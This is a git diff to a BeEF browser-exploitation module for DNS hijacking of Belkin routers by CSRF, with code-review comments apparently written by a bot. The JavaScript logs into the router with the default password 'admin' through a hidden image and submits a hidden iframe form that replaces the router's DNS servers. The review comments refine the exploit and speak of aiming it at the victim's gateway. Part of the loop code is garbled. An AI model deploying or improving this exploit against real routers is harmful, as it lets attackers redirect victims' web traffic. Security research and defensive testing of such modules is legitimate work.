diff --git a/modules/exploits/router/belkin_dns_csrf/command.js b/modules/exploits/router/belkin_dns_csrf/command.js
index 87fa94203..a3dcf6a31 100644
--- a/modules/exploits/router/belkin_dns_csrf/command.js
+++ b/modules/exploits/router/belkin_dns_csrf/command.js
@@ -7,28 +7,48 @@ beef.execute(function() {
 // config
- var gateway = '<%= @base %>';
- var path = '/cgi-bin/setup_dns.exe';
- var dns = '<%= @dns %>';
+ var proto = 'http'
+ var rhost = '<%= @rhost %>';
+ var dns1 = '<%= @dns1 %>';
+ var dns2 = '<%= @dns2 %>';
 var timeout = 15;
- // validate DNS server IP address
- var parts = dns.split('.');
+ // validate primary DNS server IP address
+ var parts = dns1.split('.');
 if (parts.length != 4) {
- beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
 return;
 }
 for (var i=0; i 255) {
- beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid DNS server IP address was provided");
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
 return;
 }
 }
- var dns_1 = parts[0];
- var dns_2 = parts[1];
- var dns_3 = parts[2];
- var dns_4 = parts[3];
+ var dns1_1 = parts[0];
+ var dns1_2 = parts[1];
+ var dns1_3 = parts[2];
+ var dns1_4 = parts[3];
+
+ // validate secondary DNS server IP address
+ var parts = dns2.split('.');
+ if (parts.length != 4) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+ return;
+ }
+ for (var i=0; i 255) {
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
+ return;
+ }
+
+ }
+ var dns2_1 = parts[0];
+ var dns2_2 = parts[1];
+ var dns2_3 = parts[2];
+ var dns2_4 = parts[3];
 // attempt auth with default password (admin)
 // incorrect login attempts do not log out an authenticated session
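Review bot: `var proto = 'http'` in the new config block has no terminating semicolon, and the primary and secondary octet checks that follow are the same dozen lines written twice, with `var parts` redeclared for the second pass. The loop body is garbled in this rendering, but the visible `> 255` bound suggests the octets are range-checked as the raw strings returned by `split('.')`, which would let non-numeric octets such as `''` or `abc` through because a comparison involving NaN is never true. A small helper that returns the four octets or null, using a digit-only regex plus `parseInt(x, 10)`, removes the duplication and tightens the check while leaving the two `beef.net.send` failure messages byte-for-byte as they are. The enclosing `beef.execute` callback starts before this hunk and ends after it.
```javascript
  var proto = 'http';
  // … unchanged: rhost, dns1, dns2, timeout …

  // Returns the four octets of a dotted-quad IPv4 address as strings, or null
  // if the address is malformed. Each octet must be 1-3 digits and <= 255;
  // comparing the raw strings would accept '', 'abc' or '1e2' via coercion.
  var parseIPv4 = function(addr) {
    var octets = addr.split('.');
    if (octets.length != 4) return null;
    for (var i = 0; i < octets.length; i++) {
      if (!/^\d{1,3}$/.test(octets[i]) || parseInt(octets[i], 10) > 255) return null;
    }
    return octets;
  };

  var dns1_parts = parseIPv4(dns1);
  if (dns1_parts === null) {
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
    return;
  }
  var dns2_parts = parseIPv4(dns2);
  if (dns2_parts === null) {
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
    return;
  }
  var dns1_1 = dns1_parts[0];
  var dns1_2 = dns1_parts[1];
  var dns1_3 = dns1_parts[2];
  var dns1_4 = dns1_parts[3];
  var dns2_1 = dns2_parts[0];
  var dns2_2 = dns2_parts[1];
  var dns2_3 = dns2_parts[2];
  var dns2_4 = dns2_parts[3];
  // … unchanged: default-password auth attempt …
```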
@@ -37,24 +57,24 @@ beef.execute(function() {
 img.setAttribute("width", "0");
 img.setAttribute("height","0");
 img.id = 'belkin_auth_<%= @command_id %>';
- img.src = gateway+"/cgi-bin/login.exe?pws=admin";
+ img.src = proto + '://' + rhost + "/cgi-bin/login.exe?pws=admin";
 document.body.appendChild(img);
 // change DNS
- var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + path, "POST", "application/x-www-form-urlencoded", [
- {'type':'hidden', 'name':'dns1_1', 'value':dns_1},
- {'type':'hidden', 'name':'dns1_2', 'value':dns_2},
- {'type':'hidden', 'name':'dns1_3', 'value':dns_3},
- {'type':'hidden', 'name':'dns1_4', 'value':dns_4},
- {'type':'hidden', 'name':'dns2_1', 'value':dns_1},
- {'type':'hidden', 'name':'dns2_2', 'value':dns_2},
- {'type':'hidden', 'name':'dns2_3', 'value':dns_3},
- {'type':'hidden', 'name':'dns2_4', 'value':dns_4},
- {'type':'hidden', 'name':'dns2_1_t', 'value':dns_1},
- {'type':'hidden', 'name':'dns2_2_t', 'value':dns_2},
- {'type':'hidden', 'name':'dns2_3_t', 'value':dns_3},
- {'type':'hidden', 'name':'dns2_4_t', 'value':dns_4},
- {'type':'hidden', 'name':'auto_from_isp', 'value':'0'}
+ var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(proto + '://' + rhost + '/cgi-bin/setup_dns.exe', "POST", "application/x-www-form-urlencoded", [
+ {'type':'hidden', 'name':'dns1_1', 'value':dns1_1},
+ {'type':'hidden', 'name':'dns1_2', 'value':dns1_2},
+ {'type':'hidden', 'name':'dns1_3', 'value':dns1_3},
+ {'type':'hidden', 'name':'dns1_4', 'value':dns1_4},
+ {'type':'hidden', 'name':'dns2_1', 'value':dns2_1},
+ {'type':'hidden', 'name':'dns2_2', 'value':dns2_2},
+ {'type':'hidden', 'name':'dns2_3', 'value':dns2_3},
+ {'type':'hidden', 'name':'dns2_4', 'value':dns2_4},
+ {'type':'hidden', 'name':'dns2_1_t', 'value':dns2_1},
+ {'type':'hidden', 'name':'dns2_2_t', 'value':dns2_2},
+ {'type':'hidden', 'name':'dns2_3_t', 'value':dns2_3},
+ {'type':'hidden', 'name':'dns2_4_t', 'value':dns2_4},
+ {'type':'hidden', 
'name':'auto_from_isp', 'value':'0'} // disable dns from ISP
 ]);
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
diff --git a/modules/exploits/router/belkin_dns_csrf/config.yaml b/modules/exploits/router/belkin_dns_csrf/config.yaml
index d97357242..6e2aa3870 100644
--- a/modules/exploits/router/belkin_dns_csrf/config.yaml
+++ b/modules/exploits/router/belkin_dns_csrf/config.yaml
@@ -3,13 +3,15 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
+# Tested on F1PI242EGau_V1.00.002 and F1PI242EGau_V1.00.009
+#
 beef:
 module:
 belkin_dns_csrf:
 enable: true
 category: ["Exploits", "Router"]
 name: "Belkin DNS Hijack CSRF"
- description: "Attempts to change the DNS setting on a Belkin router.
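Review bot: The scheme-and-host prefix `proto + '://' + rhost` is concatenated by hand twice in this hunk, once for `img.src` and again for the `createIframeXsrfForm` action, so any later change to how the target is addressed has to be made in two places. Hoisting it once, `var base = proto + '://' + rhost;`, and writing `base + "/cgi-bin/login.exe?pws=admin"` and `base + '/cgi-bin/setup_dns.exe'` keeps both requests aimed at the same host by construction. Separately, the DNS form is built right after the login image is appended; whether the `setup_dns.exe` POST can race the `login.exe` request depends on when `createIframeXsrfForm` submits, which is not visible here, and that ordering is unchanged from the old code. The enclosing `beef.execute` callback starts before this hunk and ends after it.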

Multiple models are affected, including F5D7230 and F1PI242EG, however this module has not been tested."
+ description: "Attempts to change the DNS setting on a Belkin router.

Multiple models are affected, including F5D7230 and F1PI242EG."
 authors: ["bcoles"]
 target:
- unknown: ["ALL"]
+ user_notify: ["ALL"]
diff --git a/modules/exploits/router/belkin_dns_csrf/module.rb b/modules/exploits/router/belkin_dns_csrf/module.rb
index 926f1eae9..5b0a20a06 100644
--- a/modules/exploits/router/belkin_dns_csrf/module.rb
+++ b/modules/exploits/router/belkin_dns_csrf/module.rb
@@ -2,15 +2,14 @@
 # Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
-###
-# This module has not been tested
-###
+#
 class Belkin_dns_csrf < BeEF::Core::Command
 def self.options
 return [
- {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
- {'name' => 'dns', 'ui_label' => 'DNS Server', 'value' => '8.8.8.8'}
+ {'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '10.1.1.1'},
+ {'name' => 'dns1', 'ui_label' => 'Primary DNS Server', 'value' => '8.8.8.8'},
+ {'name' => 'dns2', 'ui_label' => 'Secondary DNS Server', 'value' => '8.8.4.4'}
 ]
 end
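Review bot: The new header comment records testing only on F1PI242EGau firmware (V1.00.002 and V1.00.009), yet the rewritten `description` drops the "has not been tested" caveat for every model it names, including F5D7230, which nothing in the commit says was exercised. Keep the user-visible text as precise as the header, e.g. `Multiple models are reported to be affected, including F5D7230 and F1PI242EG; tested only against F1PI242EGau firmware V1.00.002 and V1.00.009.` The `target` change from `unknown` to `user_notify` is also unexplained; a one-line `#` comment above it saying what the user is expected to notice would save the next reader from guessing.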
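Review bot: The `rhost` default moves from the host part of the old `base` option (`192.168.1.1`) to `10.1.1.1` with no comment on which device or lab setup that value matches, so a short `#` comment above the option recording why it was chosen, and that it should be set to the victim's gateway address, would help. The old `base` option also let the operator choose the scheme, whereas the new command.js fixes it to `var proto = 'http'`; if that regression is not intended, expose it here as `{'name' => 'proto', 'ui_label' => 'Protocol', 'value' => 'http'},` and template it as `var proto = '<%= @proto %>';`. The `Belkin_dns_csrf` class opens inside this hunk but closes outside it.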